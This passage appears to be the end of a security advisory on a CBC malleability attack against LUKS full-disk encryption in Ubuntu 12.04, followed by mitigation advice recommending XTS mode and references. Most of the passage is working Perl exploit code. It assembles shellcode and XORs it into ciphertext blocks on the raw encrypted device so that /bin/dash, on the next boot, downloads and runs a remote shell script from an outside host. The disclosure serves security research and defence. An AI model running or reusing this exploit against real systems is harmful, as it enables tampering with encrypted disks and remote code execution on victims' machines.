    my $asm = ".byte " . join(",",map(ord,split("",$binary)));
    addInstruction($asm,5);
}
 
# Writes a given string on the stack using a sequence of push instructions
sub pushString{
    my($str) = @_;
    $str .= "\0";
    $str .= " " while(length($str) % 8 != 0);
    for(my $i=length($str)-8;$i&gt;=0;$i-=8){
	my $instruction = "movabs \$0x";
	for(my $j=7;$j&gt;=0;$j--){
	    $instruction .= unpack("H*",substr($str,$i+$j,1));
	}
	$instruction .= ", %rbx";
	addInstruction($instruction,10);
	addInstruction("push %rbx",1);
    }
}
 
# Adds an instruction to the shellcode. If the instruction doesn't fit to the current chunk, 
# it creates the next chunk and a jmp instruction to it automatically.
# The parameter $len gives the length of the binary instruction. If it isn't given, the 
# length is calculated using getInstructionLength()
sub addInstruction{
    my($asm,$len) = @_;
    if(!defined($len)){
	$len = getInstructionLength($asm);
    }
    if(($posInFile % 16) + $len &gt;= 14){
	while(($posInFile % 16) &lt; 14){
	    print OUT "  NOP\n";
	    $posInFile ++;
	}
	print OUT "  jmp shellcode$nextShellcodeNum\n";
	$posInFile += 2;
	print OUT "  NOP\n";
	$posInFile += 1;
	while($posInFile % 16 != 0){
	    print OUT "  NOP\n";
	    $posInFile ++;
	}
	if($posInFile % 512 == 0){
	    # The first 16 bytes of a block can't be manipulated because there is no previous ciphertext block you can manipulate
	    # So let's start with the next block in the file
	    for(1..16){
		print OUT "  NOP\n";
		$posInFile ++;
	    }
	}
	print OUT "shellcode$nextShellcodeNum:\n";
	$nextShellcodeNum++;
    }
    print OUT "  $asm\n";
    $posInFile += $len;
}
 
# Calculates the instruction length of a given instruction by writing it to an assembler file,
# compiling it and then extracting the length from the generated object file
sub getInstructionLength{
    my($asm) = @_;
    open FH,"&gt; instructionlength.S";
    print FH ".ascii \" SHELLCODE_START\"\n";
    print FH $asm,"\n";
    print FH ".ascii \"SHELLCODE_END\"\n";
    close FH;
    system("gcc -c instructionlength.S");
    open FH,"&lt; instructionlength.o" or die $!;
    my $buf;
    read(FH,$buf,1024*1024);
    $buf =~ /SHELLCODE_START(.*)SHELLCODE_END/gs;
    close(FH);
    unlink("instructionlength.S");
    unlink("instructionlength.o");
    return length($1);
}

And the following program does the actual malleability attack on the encrypted partition:

#! /usr/bin/perl
 
use warnings;
 
# Standard ext4 block size, may be 1024 or 2048 for small filesystems
# dumpe2fs -h /dev/sda1|grep "Block size"
my $blockSize = 4096; 
my $device = "/dev/sda5"; # Device of the LUKS partition
my $plaintextFile = "dash";
open FH,"&lt; $plaintextFile" or die "Can't open $plaintextFile: $!";
my $plaintextData;
read(FH,$plaintextData,100000000);
my $shellcodeElf = "shellcode.o"; # generated using make_cbc_shellcode.pl
 
# cryptsetup luksDump /dev/sda5|grep Payload
my $luksOffset = 4096*512; 
# grep -a -m1 pe_start /dev/mapper/sda5_crypt
my $lvmOffset = 384*512; 
# debugfs -R "dump_extents /bin/dash" /dev/mapper/ubuntu-root
my $filePosOnFs = 42048 * $blockSize;
 
# Position of main() in /bin/dash, label shellcode1 will be mapped to this position
my $targetPosOffset = 0x2090;
 
# Read all shellcode chunks into @patches array
my @patches;
open FH,"&lt; $shellcodeElf" or die $!;
my $shellcodeData;
read(FH,$shellcodeData,1024*1024);
my $shellcodeStartInElf = index($shellcodeData," SHELLCODE_START");
open NM,"-|","nm","--numeric-sort",$shellcodeElf or die $!; 
my $shellcode1Pos;
while(){
    next unless my($addr,$patchNum) = /^([0-9a-f]+).*shellcode(\d+)/;
    # Position of shellcode chunk in shellcode.o
    my $posInShellcodeElf = hex($addr) + $shellcodeStartInElf;
    my $shellcodeChunk = substr($shellcodeData,$posInShellcodeElf,16);
    # Position of shellcode1 label in shellcode.o
    # shellcode1 is the first label in nm output due to --numeric-sort option
    $shellcode1Pos = $posInShellcodeElf unless defined $shellcode1Pos;
    my $targetPos = $targetPosOffset + $posInShellcodeElf - $shellcode1Pos;
    push @patches, {POS =&gt; $targetPos, DATA =&gt; $shellcodeChunk};
}
 
# Apply all shellcode chunks from @patches to actual device
 
open FH,"+&lt;",$device or die "Can't open $device: $!";
for my $patch(@patches){
    my $patchPos = $patch-&gt;{POS};
    if($patchPos % 512 == 0){
	die "Can't patch at start of block (pos=$patchPos)\n";
    }
    my $shellcodeChunk = $patch-&gt;{DATA};
    die "Length of chunk at $patchPos must be 16 bytes" if(length($shellcodeChunk) != 16);
    my $originalPlaintext = substr($plaintextData,$patchPos,16);
    print "=" x 100,"\n";
    print "ORIGINAL_PLAINTEXT:\n";
    hd($originalPlaintext);
    print "SHELLCODE_CHUNK:\n";
    hd($shellcodeChunk);
    # Calculate the position of this shellcode chunk on the partition
    my $devicePos = $filePosOnFs + $patchPos + $luksOffset + $lvmOffset;
    print "DEVICE_POS: $devicePos\n";
    # The previous ciphertext block is located at $devicePos-16
    seek(FH,$devicePos-16,0);
    my $previousCiphertext;
    read(FH,$previousCiphertext,16);
    print "PREVIOUS_CIPHERTEXT:\n";
    hd($previousCiphertext);
    # The plaintext to the actual aes encryption of the block we want to modify
    my $aesPlaintext = $originalPlaintext ^ $previousCiphertext;
    print "AES_PLAINTEXT:\n"; hd($aesPlaintext);
    my $newPreviousCiphertext = $aesPlaintext ^ $shellcodeChunk;
    print "NEW_PREVIOUS_CIPHERTEXT:\n";
    hd($newPreviousCiphertext);
    # Modify previous ciphertext block at $devicePos - 16
    seek(FH,$devicePos - 16,0);
    print FH $newPreviousCiphertext;
}
 
# Pipe the binary data given as argument to the hd (hexdump) utility
sub hd{
    open HD,"|hd";print HD @_;close HD;
}

This code can be executed from a Live CD against the encrypted partition of an Ubuntu 12.04 installation. The position of the /bin/dash file needs to be adjusted by doing a reference installation with the same disk layout on a sufficiently similar hardware. After the next reboot of the manipulated Ubuntu system, it will download and execute a shell script from http://www.jakoblell.com/luks_exploit.sh .

V. Solution

This attack can be prevented by switching from CBC to another, more secure mode of operation such as XTS (XEX-based tweaked-codebook mode with ciphertext stealing) [2]. When choosing to encrypt the system with the Ubuntu 12.10 installer, the encryption is set up with mode aes-xts-plain64, which is not vulnerable to this attack. Existing systems with full disk encryption which have been installed with Ubuntu 12.04 or earlier are still potentially vulnerable to this attack. While it is possible to reencrypt an existing system with cryptsetup-reencrypt, this is a relatively dangerous operation since a hardware failure or power loss during the reencryption will lead to data loss.

If you don't know whether a given LUKS partition uses CBC or XTS, you can get the mode of operation using the following command:

# cryptsetup luksDump /dev/sda5|grep Cipher
Cipher name:    aes
Cipher mode:    cbc-essiv:sha256

When manually creating LUKS partitions, you should make sure to use XTS instead of CBC:

cryptsetup luksFormat --cipher aes-xts-plain64 /dev/sdX

Cryptsetup version 1.6 and later already chooses XTS instead of CBC by default.

However, even if this attack is prevented by using XTS, the lack of checksums of LUKS still allows (targeted) data destruction by selectively overwriting some blocks of the encrypted disk. This may be used e.g. to disable security features such as AppArmor, the screensaver (with screen locking) or the firewall of the system.

VI. References

[1] http://theinvisiblethings.blogspot.de/2009/10/evil-maid-goes-after-truecrypt.html
[2] http://en.wikipedia.org/wiki/Disk_encryption_theory#XEX-based_tweaked-codebook_mode_with_ciphertext_stealing_.28XTS.29